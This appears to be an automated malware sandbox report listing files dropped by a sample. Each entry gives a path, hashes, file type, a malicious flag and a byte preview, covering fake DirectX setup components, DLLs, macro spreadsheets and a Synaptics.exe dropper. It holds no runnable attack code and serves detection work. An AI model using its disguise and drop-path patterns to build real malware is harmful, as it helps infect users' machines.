                                                                                              SSDEEP:24576:fd5gyP75nbAgKdWsTLSCs3BZnH50ve35Jxroo6DS:F5fP75nbt0STRZn9nxrb5
                                                                                              MD5:F778928C9EB950EF493857F76A5811AD
                                                                                              SHA1:EA82D97077534751297AE0848FB1672E8F21E51E
                                                                                              SHA-256:4891E2DEA9D1798F6A89308E58C61A38E612F8433301EA2376AE14C3DFCB3021
                                                                                              SHA-512:1F382A287FC6763B8E8D66825E8256DFB7D0DEAD6B6A6B51DD7C4A5C86D536CC7EF4128BE0CE495FE17C859018750072DC7B43E3476D1BA435F209CC4EB6D43F
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............K.............<5m. .d3dx9_31_x86.cat...$.......<5.. .d3dx9_31.dll.......$...<5.. .d3dx9_31_w9x.inf.......$...<5.. .d3dx9_31_x86.inf.......$...<5.. .oct2006_d3dx9_31_x86.inf.j5o.s>..CK..\....oh"....Fl..'.......i.*vC..... `..w...6.....`.....;..E..........l.w.3....Y,..+......yg.a.....$.`0...6...XZ4.FX..J...l.V..o;F^..lH....3'.f0..G.m..P.[>...G..j..c^....p.<OAO.N.q.Z.E...hk..H...'@../.B.....q`K...y"..-9.r.'.9...x.O.R.8.......c....`Gc..C....>......X.......|0c..tz......./....-.faa.0..<,.V.^X..B......:/...y...3...X.GZ..T......Bi[.KY.x..A...3.[...s..l..J..U..h.../2Z"7......k....yB.E^.r....T........K.....,...X..)..C...z4.....b......o..yv5.!5...CD`&.\.<0..P.y9..e..`{m8..K.:(.....w..la..@.++.N... .y6.m.......,.c...[lc....d..AM.6........ .P...uD.........m...........m.e.`9t..+..aa..@5.y}r.\..rJ.={9f...3...fO4.u.V6u-z.....t.n..*.A..0%.T....L'.[K...Uh....Ul....vum.........N.U..).)Q...x.RaPk5..X3z.e...

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\DXI3B68.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):57739
                                                                                              Entropy (8bit):5.688682745352895
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:eNITdgil00BU0twUZB7otN4PTH+y491I7/su6U3mI9rITogZD0+pYnrIvdgsl0KW:eEBDSYj4kiJOnitAmfdwe5q24jIxwzKI
                                                                                              MD5:0DAFB23D5BD4B80C79A0F82DC2DE34D0
                                                                                              SHA1:8159FD03F133C9CD8CFB194971A5250B9ECDA0A8
                                                                                              SHA-256:3EF4C33102886EAE3C812B948FF3FBF70BB03DD91E772B852DA3F9AAF75BDB29
                                                                                              SHA-512:78E7FB35CAB3D0ACE4E4FEF2868CC5F31B2254C267402779893B3F3FCE90B8D784328AC19EF0D6BD37D975D557917BE19D7A8A32A94FF8606AFD36883EC1C9BB
                                                                                              Malicious:false
                                                                                              Preview:[Version]..Signature=$Chicago$..DisplayName=%SetupTitle%..MinFileSize=2000....[DirectX]..SectionType=Group..Priority=100..DisplayName=%DirectX%....[DirectX_Win9X]..DisplayName=%DirectX_Win9X%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4608,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x.cab",3..URL2="dinput_w9x_81.cab",3..URL3="dplay_w9x.cab",3..URL4="dshow_w9x.cab",3..URL5="dshow_w9x_81.cab",3..URL6="graphics_w9x.cab",3..URL7="graphics_w9x_81.cab",3..URL8="ks_w9x.cab",3..URL9="vb_w9x.cab",3..URL10="bda_w9x.cab",3..URL11="setup_w9x.cab",3..Version="9,29,1962,0"....[DirectX_Win98_ENG]..DisplayName=%DirectX_Win98%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4348,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x_eng.cab",3..URL2="dinput_w9x_81_eng.cab",3..URL3="dplay_w9x_eng.cab",3..URL4="dshow_w9x_eng.cab",3..URL5="dxdiag_w9x_eng.cab",3..URL6="graphics_w9x_eng.cab"

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup.dll

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):89944
                                                                                              Entropy (8bit):6.418506334480987
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:gtBqvGpPmOEll4RWxiF9G3ZnVdqkFKJuTJbHo0Xm+jN3i97ZTj4FWMD+ZJqsHPCL:gtAvG5mOEll4Roi2pVVFKJuTVtXVpS9y
                                                                                              MD5:0A23038EA472FFC938366EF4099D6635
                                                                                              SHA1:6499D741776DC4A446C22EA11085842155B34176
                                                                                              SHA-256:8F2C455C9271290DCDE2F68589CF825F9134BEECB7E8B7E2ECBCABEAB792280A
                                                                                              SHA-512:DCC1C2EA86FD3A7870CD0369FA42F63D493895C546DCDD492EE19079A0D0696D689BBFE7B686D4FA549841896A54E673FC4581B80783D7AA255DFAD765B9DC88
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NOd..............V..........u...eX......eX......eX......eX..`...eX......eX......Rich............PE..L....A.L...........!.........N.......p.......0......................................2.....@..........................$..y............p..h............H..X.......`... ................................=..@............................................text............................... ..`.data...<0...0......................@....rsrc...h....p.......,..............@..@.reloc...............4..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup32.dll

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1801048
                                                                                              Entropy (8bit):6.400511251324513
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:RjnIXtNeOOOOOOOOOOOOOOOOOiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWI:5IjmY
                                                                                              MD5:7672509436485121135C2A0E30B9E9FF
                                                                                              SHA1:F557022A9F42FE1303078093E389F21FB693C959
                                                                                              SHA-256:D7EA3CF1B9B639010005E503877026597A743D1068AE6A453CE77CC202796FEA
                                                                                              SHA-512:E46FF68C4A532017F8AB15B1E46565508F6285B72C7A1CBE964ED5E75320C8E14587D01FEE61B3966F43636BFE74CEBD21F7665B4A726281E771CF9230E69863
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.,.{.BZ{.BZ{.BZr..Zh.BZ{.CZ.BZ...Zi.BZ...Zz.BZ...Z..BZ...ZQ.BZ...Zz.BZ...Zz.BZRich{.BZ........................PE..L....A.L...........!.....`...................p............................................@..........................m......d^......................d..X....p... ......................................@............................................text....^.......`.................. ..`.data....4...p.......d..............@....rsrc...............v..............@..@.reloc...-...p.......6..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.cif

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):66865
                                                                                              Entropy (8bit):5.567626982635727
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:Wn+OeDyG6lG9CVGQM6UP8XUUkw8KlNxLkPkjdARflPp0VZRTBM9oZPFASJu71N1F:V
                                                                                              MD5:B36D3F105D18E55534AD605CBF061A92
                                                                                              SHA1:788EF2DE1DEA6C8FE1D23A2E1007542F7321ED79
                                                                                              SHA-256:C6C5E877E92D387E977C135765075B7610DF2500E21C16E106A225216E6442AE
                                                                                              SHA-512:35AE00DA025FD578205337A018B35176095A876CD3C3CF67A3E8A8E69CD750A4CCC34CE240F11FAE3418E5E93CAF5082C987F0C63F9D953ED7CB8D9271E03B62
                                                                                              Malicious:false
                                                                                              Preview:..[Version]..Signature=$Chicago$..DisplayName=%SetupTitle%..MinFileSize=2000....[DirectX]..SectionType=Group..Priority=100..DisplayName=%DirectX%....[DXUpdate_Feb2005_x86]..DisplayName=%Feb2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=990,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="Feb2005_d3dx9_24_x86.cab",3..Version=4,09,00,0904....[DXUpdate_Feb2005_x64]..DisplayName=%Feb2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=1220,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="Feb2005_d3dx9_24_x64.cab",3..Version=4,09,00,0904....[DXUpdate_Apr2005_x86]..DisplayName=%Apr2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=1055,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="Apr2005_d3dx9_25_x86.cab",3..Version=4,09,00,0904....[DXUpdate_Apr2005_x64]..DisplayName=%Apr2005%..Details=%DirectX_Desc%..SectionType=Component..Platform=NT5..Group=DirectX..Size=1317

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dll

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):177152
                                                                                              Entropy (8bit):6.549767948531931
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:KU6LKKnw8i/9S7BLGKm/nuFV3uNgosUBxr+2y97CqGIpHtWMeJnQRLj+bTHyKaY:Iw8aIMrfuFVeNgosUBxra4rIZsqq
                                                                                              MD5:7ED554B08E5B69578F9DE012822C39C9
                                                                                              SHA1:036D04513E134786B4758DEF5AFF83D19BF50C6E
                                                                                              SHA-256:FB4F297E295C802B1377C6684734B7249D55743DFB7C14807BEF59A1B5DB63A2
                                                                                              SHA-512:7AF5F9C4A3AD5C120BCDD681B958808ADA4D885D21AEB4A009A36A674AD3ECE9B51837212A982DB6142A6B5580E5B68D46971B802456701391CE40785AE6EBD9
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M.CM...M...MJ..M...M...M...M...M...M...M..KM...M..zM...M..{M...M..JM...M..MM...MRich...M................PE..L......M...........!.....j...n............................................................@.........................pw..V....j..........8.......................X...p...................................@...............8............................text....h.......j.................. ..`.data....:...........n..............@....rsrc...8...........................@..@.reloc..0&.......(..................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.inf

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):12848
                                                                                              Entropy (8bit):5.071095411173453
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:eXTiDxtV0xxmBxbD6Ys7s6xHOJYwYdDxAp8xXZyUxIJM:eXiM
                                                                                              MD5:E6A74342F328AFA559D5B0544E113571
                                                                                              SHA1:A08B053DFD061391942D359C70F9DD406A968B7D
                                                                                              SHA-256:93F5589499EE4EE2812D73C0D8FEACBBCFE8C47B6D98572486BC0EFF3C5906CA
                                                                                              SHA-512:1E35E5BDFF1D551DA6C1220A1A228C657A56A70DEDF5BE2D9273FC540F9C9F0BB73469595309EA1FF561BE7480EE92D16F7ACBBD597136F4FC5F9B8B65ECDFAD
                                                                                              Malicious:false
                                                                                              Preview:..; ---- Common sections ----..[Version]..Signature = "$CHICAGO$"..AdvancedINF = 2.0..Provider = %MSFT%..SetupClass = BASE....[Strings]..MSFT = "Microsoft"....[MDXDLLs]..Microsoft.DirectX.AudioVideoPlayback.dll..Microsoft.DirectX.Diagnostics.dll..Microsoft.DirectX.Direct3D.dll..Microsoft.DirectX.Direct3DX.dll..Microsoft.DirectX.DirectDraw.dll..Microsoft.DirectX.DirectInput.dll..Microsoft.DirectX.DirectPlay.dll..Microsoft.DirectX.DirectSound.dll..Microsoft.DirectX.dll......; ---- Windows 98 ----..[4.09.00.0904.00-4.09.00.0904.00_Win98_Feb2005_d3dx9_24_x86.cab]..NumberOfFiles=4..Size=2178 ;approximately total file size (Size * 1024 bytes)..CopyCount=1..d3dx9_24_w9x.inf....[4.09.00.0904.00-4.09.00.0904.00_Win98_Feb2005_MDX_x86.MSI]..NumberOfFiles=1..Size=1788 ;approximately total file size (Size * 1024 bytes)..CopyCount=1..Dependencies=feb2005_d3dx9_24_x86.cab..Feb2005_MDX_x86.MSI......; ---- Windows ME ----..[4.09.00.0904.00-4.09.00.0904.00_WinME_Feb2005_d3dx9_24_x86.cab]..N

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.cif

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):57739
                                                                                              Entropy (8bit):5.688682745352895
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:eNITdgil00BU0twUZB7otN4PTH+y491I7/su6U3mI9rITogZD0+pYnrIvdgsl0KW:eEBDSYj4kiJOnitAmfdwe5q24jIxwzKI
                                                                                              MD5:0DAFB23D5BD4B80C79A0F82DC2DE34D0
                                                                                              SHA1:8159FD03F133C9CD8CFB194971A5250B9ECDA0A8
                                                                                              SHA-256:3EF4C33102886EAE3C812B948FF3FBF70BB03DD91E772B852DA3F9AAF75BDB29
                                                                                              SHA-512:78E7FB35CAB3D0ACE4E4FEF2868CC5F31B2254C267402779893B3F3FCE90B8D784328AC19EF0D6BD37D975D557917BE19D7A8A32A94FF8606AFD36883EC1C9BB
                                                                                              Malicious:false
                                                                                              Preview:[Version]..Signature=$Chicago$..DisplayName=%SetupTitle%..MinFileSize=2000....[DirectX]..SectionType=Group..Priority=100..DisplayName=%DirectX%....[DirectX_Win9X]..DisplayName=%DirectX_Win9X%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4608,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x.cab",3..URL2="dinput_w9x_81.cab",3..URL3="dplay_w9x.cab",3..URL4="dshow_w9x.cab",3..URL5="dshow_w9x_81.cab",3..URL6="graphics_w9x.cab",3..URL7="graphics_w9x_81.cab",3..URL8="ks_w9x.cab",3..URL9="vb_w9x.cab",3..URL10="bda_w9x.cab",3..URL11="setup_w9x.cab",3..Version="9,29,1962,0"....[DirectX_Win98_ENG]..DisplayName=%DirectX_Win98%..Details=%DirectX_Desc%..SectionType=Component..Platform=Win98,Millen..Group=DirectX..Size=4348,0..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL1="audio_w9x_eng.cab",3..URL2="dinput_w9x_81_eng.cab",3..URL3="dplay_w9x_eng.cab",3..URL4="dshow_w9x_eng.cab",3..URL5="dxdiag_w9x_eng.cab",3..URL6="graphics_w9x_eng.cab"

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):498688
                                                                                              Entropy (8bit):5.921914360240825
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:yiqLKTd9mKfwm7rfrK7iPG6rG3C7hO4YTYHVzoPD+sUn7RG+hPXzNbgC1Adm2exP:6kvS4c3C7iMw70
                                                                                              MD5:EAA6B5EE297982A6A396354814006761
                                                                                              SHA1:780BF9A61C080A335E8712C5544FCBF9C7BDCD72
                                                                                              SHA-256:D298FD82A39B2385A742BA1992466E081BEA0F49E19ECE6B2C87C7C262E1FCEE
                                                                                              SHA-512:EBDC887B6B334B7560F85AB2EBD29DC1F3A2DEDAC7F70042594F2A9BC128B6FCA0A0E7704318ED69B7ACF097E962533B3CE07713EF80E8ACFE09374C13302999
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`7..$V..$V..$V..K L.5V..-.A.5V..$V..V..K x.OV..K y..V..K H.%V..K O.%V..Rich$V..................PE..L....A.L.................v..."....................................................../.....@...... ..........................Lx.......................................................................^..@...............`............................text....u.......v.................. ..`.data....1...........z..............@....rsrc...............................@..@.reloc........... ...|..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.inf

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                              File Type:Windows setup INFormation
                                                                                              Category:dropped
                                                                                              Size (bytes):477
                                                                                              Entropy (8bit):5.237059564403252
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:AEAv+BIHfXhPJycXlnMlr4TFagtVFIglFdW8HEwF2T2GHEdqT2azM2GvjokVj2aE:BBIpPJhXlnMYFz2gkDvqtwqa9YS7r
                                                                                              MD5:AD8982EAA02C7AD4D7CDCBC248CAA941
                                                                                              SHA1:4CCD8E038D73A5361D754C7598ED238FC040D16B
                                                                                              SHA-256:D63C35E9B43EB0F28FFC28F61C9C9A306DA9C9DE3386770A7EB19FAA44DBFC00
                                                                                              SHA-512:5C805D78BAFFF06C36B5DF6286709DDF2D36808280F92E62DC4C285EDD9176195A764D5CF0BB000DA53CA8BBF66DDD61D852E4259E3113F6529E2D7BDBDD6E28
                                                                                              Malicious:false
                                                                                              Preview:[Version]..Signature="$CHICAGO$"..AdvancedINF=2.0..Provider = %MSFT%....[SourceDisksNames]..1 = %DiskName%,DXWSETUP.EXE,0....[SourceDisksFiles]..dsetup.dll=1..dsetup32.dll=1....[DestinationDirs]..DSetupDLL=11,directx\websetup....[DirectX_WinNT]..CopyFiles=DSetupDLL....[DirectX_Win9X]..CopyFiles=DSetupDLL....[CleanUp]..DelFiles=DSetupDLL....[DSetupDLL]..dsetup.dll,,,32..dsetup32.dll,,,32....[Strings]..MSFT = "Microsoft"..DiskName = "DXWSETUP"....

                                                                                              C:\Users\user\AppData\Local\Temp\r4UZcR9I.xlsm

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Category:dropped
                                                                                              Size (bytes):18387
                                                                                              Entropy (8bit):7.523057953697544
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                              Malicious:false
                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                              C:\Users\user\AppData\Local\Temp\sY99VLt.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.252463725043014
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0TTSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                              MD5:BC8ABA5D490ADDFC268FE40D4DCC2A77
                                                                                              SHA1:20E6228F6522FF96508D8AA553CE1D7E55508544
                                                                                              SHA-256:89FDB949EB2C2D8A3C0080F092B88E9104057C813C9411CECB65E145F97B6278
                                                                                              SHA-512:D01A62CDB2C0429C0E9F6A87C4A684EDCC22E56D856A89CE89E274F4AAD34708543928E04437EE907E31BDF18EB7277ABBEC49BC35F7DD7480BCD5220943374D
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xDHj-wi5GuueQlAnJeFd8g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\~$r4UZcR9I.xlsm

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):165
                                                                                              Entropy (8bit):1.5231029153786204
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                              MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                              SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                              SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                              SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                              Malicious:false
                                                                                              Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                              C:\Users\user\AppData\Local\Temp\~DF26C05A2AD06F381B.TMP

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):3.746897789531007
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                              MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                              SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                              SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                              SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                              Malicious:false
                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\Desktop\._cache_file.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):288088
                                                                                              Entropy (8bit):7.744384810651628
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:pWK8EGMUjp5cGQ3Mek1B3B9h8Ins3i8AEYBSawz1YSc:JGvjp5cj35kDB9hrs3zARBSaJSc
                                                                                              MD5:FD6057B33E15A553DDC5D9873723CE8F
                                                                                              SHA1:F90EFB623B5ABEA70AF63C470DAA8674444FB1DF
                                                                                              SHA-256:111AEDDC6A6DBF64B28CB565AA12AF9EE3CC0A56CE31E4DA0068CF6B474C3288
                                                                                              SHA-512:D894630C9A4BDB767E9F16D1B701ACBDF011E721768BA0DC7A24E6D82A4D062A7CA253B1B334EDBA38C06187104351203A92C017838BDD9F13905CDE30F7D94D
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......->..i_.i_.i_..|.d_.i_.._..|..h_..|.q_..|.h_.Richi_.........PE..L...!.};............................^Z..............................................O................................................................N..X............................................................................................text............................... ..`.data...............................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\Documents\BJZFPPWAPT\EOWRVPQCCS.xlsm

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Category:dropped
                                                                                              Size (bytes):18387
                                                                                              Entropy (8bit):7.523057953697544
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                              Malicious:false
                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                              C:\Users\user\Documents\BJZFPPWAPT\~$EOWRVPQCCS.xlsx

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):165
                                                                                              Entropy (8bit):1.5231029153786204
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                              MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                              SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                              SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                              SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                              Malicious:false
                                                                                              Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                              C:\Users\user\Documents\BJZFPPWAPT\~$cache1

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):771584
                                                                                              Entropy (8bit):6.6264053582391735
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IIr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                              MD5:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              SHA1:B48603F6A1DFFAB2FF458780025F6A3C2E523C3C
                                                                                              SHA-256:1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                                                                                              SHA-512:38334452808E5D203B287E2F4A47B8F5BBCE1ED18FABCFA4A61B8C04429150DFBFFE2241323B3C87D90ABBABBED49A5CEA584CC1CE83BF519BB728E1D6AC18EB
                                                                                              Malicious:true
                                                                                              Yara Hits:
